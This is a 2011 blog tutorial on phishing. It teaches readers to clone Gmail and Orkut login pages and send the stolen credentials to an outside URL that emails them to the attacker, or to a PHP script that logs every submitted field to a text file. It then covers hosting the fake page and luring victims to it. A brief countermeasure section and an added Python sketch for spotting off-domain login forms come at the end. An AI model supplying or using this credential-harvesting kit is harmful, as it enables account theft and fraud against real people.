Thursday, July 21, 2011

Phishing (Basic Level)

What is Phishing?

Phishing is a technique to obtain passwords, usernames, or other sensitive information such as credit card details using a fake page that pretends to be a real one.


How to perform the attack?

Method-1: Directing the username and password to your email ID

1. First, you need to create a fake login page. So, how do you do it?
Example: Open gmail.com in your browser. On the login page, right-click and save the page.

2. You must know basic HTML to understand this step. The HTML code contains an "ACTION" keyword whose task is to send the details entered on the page to a handler (script). What we have to do is change the value of that "ACTION" in the form. Let's see how to do it.
Example: Open the saved login page (gmail.com in our example) with Notepad -> press "Ctrl+F" (find mode) -> type the "action" keyword to find it.
Now that you have located the "action", change the code: inside the two immediate double quotes, replace the code with:
"http://kyrion.in/download/adjgtr.phpid=example@gmail.com&link=gmail.com"
Replace "example@gmail.com" with your email ID.
Note: The "link" in the above URL is used to direct the page back to gmail.com; you can change it as per your need.

3. Now try logging in and check whether you are getting the email or not. If everything is working well, it is time to upload these login pages. To do so, choose any free web hosting site (e.g. my3gb.com): create an account, go to the file manager and upload all the files and folders that you saved.

4. Now give the link (say: username.my3gb.com/gmail.html) of your fake login page to the victim through email or any other way. Now it is up to you how to make your victim log in through your fake page (use your head).





Method-2: Storing the username and password in a txt file (uploaded to the website)

1. First, you need to create a fake login page. So, how do you do it?
Example: Open orkut.com in your browser. On the login page, right-click and save the page.

2. Now create the notify.php file (copy and paste the code below and save it with the name notify.php).



notify.php
<?php
header ('Location:http://www.orkut.com ');
$file = fopen("store.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>



3.Now create an empty store.txt file.

4. Open the login page saved earlier with Notepad and find the word "action" (hint: press "Ctrl+F"). Change the value of action (inside the two immediate double quotes) to "notify.php",
i.e. after submission the login form will be handled by notify.php, which will then redirect the page to orkut.com. Check the header section of the PHP code; you can change it as per your need.









5. Upload all files (the fake login page with its folder, notify.php and store.txt) to my3gb.com (or any free hosting site).

6. Serve your fake login page link to the victim. Once the victim logs in through your page, the login details will be stored in "store.txt", so don't forget to check the store.txt file.


Countermeasures:

The only possible countermeasure is simply not to enter confidential data without checking the URL of the website. In some other phishing attacks the URL can be spoofed, so it is better to also check the certificate of the website.
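
The URL check can also be automated on the page side: both methods above leave a password form that is served from, or posts to, a host outside the real site's domain. The following detection sketch is an added example, not part of the original post; the function and class names, the sample markup and the hostnames are constructed for illustration, and it generalizes to any expected domain.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample pages (not real markup from any site).
LEGIT = '<form action="https://accounts.example.com/signin"><input type="password" name="p"></form>'
CLONE = '<form action="notify.php" method="post"><input type="text" name="u"><input type="password" name="p"></form>'

class FormScanner(HTMLParser):
    """Collect [action, has_password_field] for every <form> on a page."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None  # form currently being parsed

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = [attrs.get("action") or "", False]
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def suspicious_login_forms(html, page_url, expected_domain):
    """Explain why password forms on page_url do not belong to expected_domain."""
    def on_domain(host):
        host = (host or "").lower()
        return host == expected_domain or host.endswith("." + expected_domain)

    scanner = FormScanner()
    scanner.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for action, has_password in scanner.forms:
        if not has_password:
            continue
        # A relative or empty action resolves against the page's own URL.
        target = urlparse(urljoin(page_url, action))
        if not on_domain(page_host):
            findings.append(f"page served from {page_host}")
        if not on_domain(target.hostname):
            findings.append(f"credentials post to {target.hostname}")
        if target.scheme != "https":
            findings.append(f"credentials sent over {target.scheme}")
    return findings
```

A mail gateway or web proxy can run this kind of check against fetched pages; an empty result only means the form target looks consistent, not that the page is trustworthy.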
